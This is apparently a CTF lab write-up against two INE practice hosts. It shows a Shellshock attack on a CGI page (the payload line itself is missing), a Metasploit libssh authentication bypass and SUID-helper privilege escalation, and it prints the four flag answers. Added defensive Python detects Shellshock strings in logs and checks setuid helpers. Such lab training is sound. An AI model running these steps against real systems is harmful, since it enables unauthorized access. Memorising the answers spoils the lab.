System-Host Based Attacks CTF 2
Overview
System/host-based attacks target the underlying operating system or individual hosts within a network to compromise their security. These attacks exploit vulnerabilities in the system's configuration, software, or hardware to gain unauthorized access, escalate privileges, or disrupt the normal functioning of the host. Common techniques include exploiting unpatched software vulnerabilities, misconfigurations, weak passwords, and malware infections. Attackers may attempt to gain root or administrator privileges to manipulate or steal sensitive data, install backdoors, or cause system crashes. System/host-based attacks can lead to significant breaches if not detected and mitigated promptly, making it essential for organizations to regularly update software, implement strong security policies, and monitor for suspicious activity to protect their systems from these threats.
This lab is designed to test your knowledge and skills in performing system/host-based attacks on Linux targets and identifying hidden information on a target machine.
In this lab environment, you will be provided with GUI access to a Kali Linux machine. Two machines are accessible at http://target1.ine.local and http://target2.ine.local.
Objective: Perform system/host-based attacks on the target and capture all the flags hidden within the environment.
Flags to Capture:
Flag 1: Check the root ('/') directory for a file that might hold the key to the first flag on target1.ine.local.
Flag 2: In the server's root directory, there might be something hidden. Explore '/opt/apache/htdocs/' carefully to find the next flag on target1.ine.local.
Flag 3: Investigate the user's home directory and consider using 'libssh_auth_bypass' to uncover the flag on target2.ine.local.
Flag 4: The most restricted areas often hold the most valuable secrets. Look into the '/root' directory to find the hidden flag on target2.ine.local.
Writeup
Flag 1
Let's start with an nmap scan of target1.ine.local:
┌──(root㉿INE)-[~/Desktop]
└─# nmap -p- --min-rate=10000 target1.ine.local | tee nmap_fast,txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-07 20:35 IST
Nmap scan report for target1.ine.local (192.25.122.3)
Host is up (0.000024s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 02:42:C0:19:7A:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 2.27 seconds
┌──(root㉿INE)-[~/Desktop]
└─# nmap -sC -sV target1.ine.local -p80
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-07 20:35 IST
Nmap scan report for target1.ine.local (192.25.122.3)
Host is up (0.000063s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.6 ((Unix))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (Unix)
|_http-title: Browser Detector
MAC Address: 02:42:C0:19:7A:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.42 seconds
Your browser, that is, Firefox, is supported!
The page reflects the visitor's browser back to them, and it is served by a CGI script (browser.cgi) on Apache 2.4.6, so this smells like Shellshock via the User-Agent header. I open Burp Suite and run a few tests. This payload works:
And I get a shell. In the root directory (/) we find the flag:
daemon@target1:/opt/apache/htdocs$ cd /
daemon@target1:/$ ls
bin dev flag.txt lib media opt root sbin start-apache2.sh sys usr
boot etc home lib64 mnt proc run srv startup.sh tmp var
daemon@target1:/$ cat flag.txt
Answer
d8354617536449099a2ff6a5d657d1f4
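As an added example (not part of the original writeup), here is the detection side of the attack above: a scanner that reads Apache combined-format access-log lines and flags requests whose User-Agent, Referer or request line carries the Shellshock function-definition marker. The log format, the sample lines and all field names are assumptions.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" LogFormat (assumed; not the lab's actual configuration):
# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock marker: a bash function definition "() {" inside a header value.
# mod_cgi exports request headers into the CGI environment (HTTP_USER_AGENT,
# HTTP_REFERER, ...), which is why a header value can reach bash at all.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; return None if it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None

def shellshock_field(entry: Dict[str, str]) -> Optional[str]:
    """Return the first attacker-controlled field carrying the marker, else None."""
    for field in ("ua", "referer", "req"):
        if SHELLSHOCK_RE.search(entry[field]):
            return field
    return None

def find_shellshock(lines: List[str]) -> List[Dict[str, str]]:
    """Scan log lines and return one alert per suspicious request."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # unparsable line: in production, count these separately
        field = shellshock_field(entry)
        if field:
            alerts.append({"ip": entry["ip"], "ts": entry["ts"],
                           "req": entry["req"], "field": field})
    return alerts

# Constructed sample log, not taken from the lab machine.
SAMPLE_LOG = [
    '192.25.122.2 - - [07/Apr/2025:20:40:01 +0530] "GET /browser.cgi HTTP/1.1" '
    '200 97 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"',
    '192.25.122.2 - - [07/Apr/2025:20:41:12 +0530] "GET /browser.cgi HTTP/1.1" '
    '200 97 "-" "() { :; }; echo SHOCK"',
    '192.25.122.2 - - [07/Apr/2025:20:41:30 +0530] "GET /browser.cgi HTTP/1.1" '
    '500 0 "() {:;}; /bin/true" "curl/8.5.0"',
]

if __name__ == "__main__":
    for alert in find_shellshock(SAMPLE_LOG):
        print(f"{alert['ts']} {alert['ip']} {alert['req']} via {alert['field']}")
```

The marker regex tolerates whitespace variations, which is what real probes vary; matching only the literal `() { :; };` string would miss the third sample line.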
Flag 2
The hint says to look carefully inside /opt/apache/htdocs, the web root we landed in:
daemon@target1:/opt/apache/htdocs$ ls
browser.cgi index.html static
A plain ls hides dotfiles, so list everything with ls -la:
daemon@target1:/opt/apache/htdocs$ ls -la
total 32
drwxr-xr-x 1 root root 4096 Apr 7 15:03 .
drwxr-xr-x 1 root root 4096 Dec 28 2021 ..
-rw-r--r-- 1 root root 39 Apr 7 15:03 .flag.txt
-rwxr-xr-x 1 root root 6364 Dec 28 2021 browser.cgi
-rw-r--r-- 1 root root 517 Dec 28 2021 index.html
drwxr-xr-x 5 root root 4096 Dec 27 2021 static
daemon@target1:/opt/apache/htdocs$ cat .flag.txt
Answer
f5d3b442c070455eb4dcd25d72734e47
Flag 3
Let's start with an nmap scan of target2.ine.local:
┌──(root㉿INE)-[~]
└─# nmap -p- --min-rate=10000 target2.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-07 20:54 IST
Nmap scan report for target2.ine.local (192.25.122.4)
Host is up (0.000025s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 02:42:C0:19:7A:04 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 2.36 seconds
┌──(root㉿INE)-[~]
└─# nmap -sC -sV -p22 target2.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-07 20:54 IST
Nmap scan report for target2.ine.local (192.25.122.4)
Host is up (0.000057s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh libssh 0.8.3 (protocol 2.0)
| ssh-hostkey:
|_ 2048 31:e2:1d:f1:b2:39:0c:a3:ec:db:01:4a:eb:a2:39:c7 (RSA)
MAC Address: 02:42:C0:19:7A:04 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds
The SSH server identifies itself as libssh 0.8.3, so let's open msfconsole and see what we can do:
msf6 > search libssh
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/libssh_auth_bypass 2018-10-16 normal No libssh Authentication Bypass Scanner
1 \_ action: Execute . . . Execute a command
2 \_ action: Shell . . . Spawn a shell
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set rhosts target2.ine.local
rhosts => target2.ine.local
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > set spawn_PTY 1
spawn_PTY => true
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > run
[*] 192.25.122.4:22 - Attempting authentication bypass
[*] Attempting "Shell" Action, see "show actions" for more details
[*] Command shell session 2 opened (192.25.122.2:36141 -> 192.25.122.4:22) at 2025-04-07 21:04:23 +0530
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/libssh_auth_bypass) > sessions -i 2
[*] Starting interaction with 2...
Shell Banner:
_[?2004hsh-5.2$
-----
sh-5.2$ whoami
whoami
user
sh-5.2$
sh-5.2$ cd home
ls
cd home
sh-5.2$ ls
temp user
sh-5.2$ cd user
cd user
sh-5.2$ ls
ls
flag.txt greetings welcome
sh-5.2$ cat flag.txt
cat flag.txt
Answer
33462cf84fa44ea5bbac529528f78c15
Flag 4
Let's look at these two files, greetings and welcome:
-rwx------ 1 root root 8296 Jun 11 2024 greetings
-rwsr-xr-x 1 root root 8344 Jun 11 2024 welcome
welcome is SUID root. Running strings on welcome shows that it references greetings, so maybe it simply echoes whatever greetings contains. Both files are root-owned, but they live in our home directory, so we can delete greetings even though it is write-protected and replace it with a copy of /bin/bash:
[user@target2 ~]$ rm greetings
rm greetings
rm: remove write-protected regular file 'greetings'? y
y
[user@target2 ~]$ cp /bin/bash greetings
cp /bin/bash greetings
[user@target2 ~]$ welcome
welcome
[root@target2 ~]# cat /root/flag.txt
Answer
7b145fd0fb39471b92b5e54d6f0f0da9
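As an added example (not part of the original writeup), the check a setuid program like welcome should perform before executing a helper such as greetings. The file being root-owned and 0700 is not enough: the lab's weakness is that the helper sits in a directory the user owns, so the user can unlink and recreate it. The function names, the uid 1000 and the path layout are assumptions.

```python
import os
import stat
from typing import List

def helper_risks(path: str, file_uid: int, file_mode: int,
                 dir_uid: int, dir_mode: int) -> List[str]:
    """Return the reasons a privileged program should refuse to execute `path`.
    Pure function over stat-like values so it can be tested without root.
    An empty list means the helper cannot be swapped out by an unprivileged user."""
    risks = []
    if not os.path.isabs(path):
        risks.append("relative path: resolved against caller-controlled cwd/PATH")
    if file_uid != 0:
        risks.append("helper not owned by root")
    if file_mode & (stat.S_IWGRP | stat.S_IWOTH):
        risks.append("helper writable by group/other")
    # The lab's bug: a root-owned file inside a user-owned directory. The owner of
    # the directory can rm it (rm only asks for confirmation) and cp anything in.
    if dir_uid != 0:
        risks.append("parent directory not owned by root: owner can unlink/replace")
    if dir_mode & (stat.S_IWGRP | stat.S_IWOTH) and not (dir_mode & stat.S_ISVTX):
        risks.append("parent directory group/world writable without sticky bit")
    return risks

def check_helper(path: str) -> List[str]:
    """Live check of a real path. lstat so a symlink is reported, not followed."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return ["helper is a symlink"]
    dst = os.stat(os.path.dirname(os.path.abspath(path)))
    return helper_risks(path, st.st_uid, st.st_mode, dst.st_uid, dst.st_mode)

if __name__ == "__main__":
    # Constructed values mirroring the lab: root-owned 0700 'greetings' inside
    # /home/user, with the home directory owned by uid 1000 (assumed) and mode 0700.
    print(helper_risks("/home/user/greetings", 0, 0o100700, 1000, 0o40700))
    # A sane placement: the helper under a root-owned, non-writable directory.
    print(helper_risks("/usr/libexec/greetings", 0, 0o100700, 0, 0o40755))
```

Even with this check in place, a setuid program that must run a helper should drop privileges first unless the helper genuinely needs root.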